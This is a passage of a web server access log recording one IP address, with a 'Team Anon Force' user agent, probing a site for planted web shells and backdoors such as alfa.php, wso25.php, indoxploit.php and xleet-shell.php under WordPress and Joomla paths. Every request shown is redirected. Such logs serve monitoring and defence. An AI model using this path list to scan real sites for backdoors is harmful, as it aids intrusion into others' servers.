Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:41 -0400] "GET /alfaindex.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:45 -0400] "GET /.alf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:49 -0400] "GET /wp-content/plugins/cekidot/alf.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:53 -0400] "GET /wp-content/fw.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:56 -0400] "GET /wp-content/alfa.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:00 -0400] "GET /snd.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:05 -0400] "GET /wp-class.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:10 -0400] "GET /small.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:14 -0400] "GET /wp-content/plugins/upspy/index.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:17 -0400] "GET /wp-content/plugins/ubh/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:20 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php?cache HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:24 -0400] "GET /wp-content/themes/gaukingo/db.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:29 -0400] "GET /wp-content/plugins/three-column-screen-layout/db.php HTTP/1.1" 301 287 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:33 -0400] "GET /wp-content/plugins/xichang/x.php?xi HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:36 -0400] "GET /wp-content/plugins/html404/index.html HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:40 -0400] "GET /wp-content/plugins/wp-db-ajax-made/wp-ajax.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:44 -0400] "GET /Marvins.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:48 -0400] "GET /wp-includes/css/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:53 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:58:57 -0400] "GET /wp-content/plugins/css-ready-sel/file.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:01 -0400] "GET /wp-content/plugins/css-ready/file.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:07 -0400] "GET /wp-content/think.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:11 -0400] "GET /wp-content/plugins/html404/xccc.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:15 -0400] "GET /wp-content/plugins/html404/cry.php.pjpeg HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:19 -0400] "GET /wp-content/plugins/real/v.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:23 -0400] "GET /wp-content/plugins/html404/wso25.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:27 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:31 -0400] "GET /libraries/joomla/css.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:35 -0400] "GET /libraries/joomla/jmails.php?u HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:40 -0400] "GET /libraries/joomla/jmail.php?u HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:44 -0400] "GET /images/vuln.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:48 -0400] "GET /tmp/vuln.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:51 -0400] "GET /rxr.php?rxr HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:59:57 -0400] "GET /modules/modules/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:02 -0400] "GET /error.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:08 -0400] "GET /wp-content/themes/fitnessbase/404.php?ok HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:13 -0400] "GET /wp-add-admin.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:18 -0400] "GET /RxR.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:21 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:25 -0400] "GET /components/com_b2jcontact/izoc.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:29 -0400] "GET /administrator/templates/bluestork/error.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:33 -0400] "GET /administrator/templates/hathor/index.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:36 -0400] "GET /administrator/templates/hathor/error.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:51 -0400] "GET /administrator/templates/isis/index.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:00:56 -0400] "GET /administrator/templates/isis/error.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:00 -0400] "GET /templates/beez/index.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:07 -0400] "GET /templates/ja_purity/index.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:12 -0400] "GET /templates/rhuk_milkyway/index.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:17 -0400] "GET /templates/+theme+/index.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:20 -0400] "GET /templates/+theme+/error.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:27 -0400] "GET /templates/beez3/index.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:32 -0400] "GET /templates/beez3/error.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:36 -0400] "GET /templates/beez5/index.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:46 -0400] "GET /templates/beez5/error.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:50 -0400] "GET /templates/beez_20/index.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:01:58 -0400] "GET /templates/beez_20/error.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:06 -0400] "GET /templates/protostar/index.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:11 -0400] "GET /templates/protostar/error.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:19 -0400] "GET /templates/atomic/index.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:25 -0400] "GET /templates/atomic/error.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:31 -0400] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:43 -0400] "GET /wp-content/vuln.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:50 -0400] "GET /upel.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:02:56 -0400] "GET /wp-content/uploads/ HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:01 -0400] "GET /wp-content/uploads/+year+/+month+/ HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:11 -0400] "GET /license.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:20 -0400] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:33 -0400] "GET /098.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:42 -0400] "GET /new_license.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:49 -0400] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:03:57 -0400] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:04 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:08 -0400] "GET /1975.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:16 -0400] "GET /1975.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:22 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:26 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:30 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:33 -0400] "GET /wp-content/radio.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:37 -0400] "GET /wp-includes/radio.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:42 -0400] "GET /fx.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:46 -0400] "GET /wp-admin/images/atomlib.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:49 -0400] "GET /gel4y.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:53 -0400] "GET /jindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:04:57 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:00 -0400] "GET /sh.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:06 -0400] "GET /wp-includes/991176.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:12 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:07:05:19 -0400] "GET /fox.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 